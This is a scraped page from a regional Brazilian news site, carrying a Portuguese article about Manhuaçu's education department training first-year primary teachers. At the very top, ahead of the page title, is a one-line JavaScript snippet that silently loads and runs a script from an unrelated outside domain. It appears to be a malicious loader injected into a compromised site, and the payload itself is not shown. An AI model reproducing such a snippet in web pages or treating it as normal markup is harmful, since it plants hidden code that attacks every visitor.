;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Manhuaçu - Educação capacita professores fundamental. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Manhuaçu – Educação capacita professores fundamental.

A Prefeitura de Manhuaçu, por meio da Secretaria de Educação, deu início nesta segunda-feira, 09, à Oficina Pedagógica 2016. O objetivo é capacitar todos os professores do primeiro ano do Ensino Fundamental da rede municipal de ensino. O treinamento segue até o fim desta semana.

Segundo a pedagoga e organizadora Vera Lúcia Pimentel, o treinamento é preparado com base em uma avaliação diagnóstica, realizada com a finalidade de detectar as maiores necessidades dos professores. “Todo início de ano a equipe pedagógica trabalha com essa avaliação. Ela é um norte para nós prepararmos esse trabalho” – explica.

Ainda segundo Pimentel, o foco das oficinas está em auxiliar a prática do professor no seu dia a dia, com sugestão de atividades, aliando teoria e prática. “Então temos dois momentos, um deles é sobre o que trabalhar, e outro é como trabalhar” – detalha. “O professor sairá com uma bagagem para estar colocando em prática na sala de aula para auxiliar na aprendizagem dos seus alunos” – finaliza. “A importância é essa, a de termos um professor sempre treinado, sempre discutindo novas abordagens, buscando novos caminhos. A nossa meta desde o início é buscar essas capacitações para os nossos docentes” – justifica a secretária de Educação, Gelvânia Câmara. “Precisamos ter sempre um olhar novo para que a aprendizagem seja eficaz, acreditamos que assim nós melhoramos nosso ensino ” – defende.

Secretaria de Comunicação Social de Manhuaçu

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.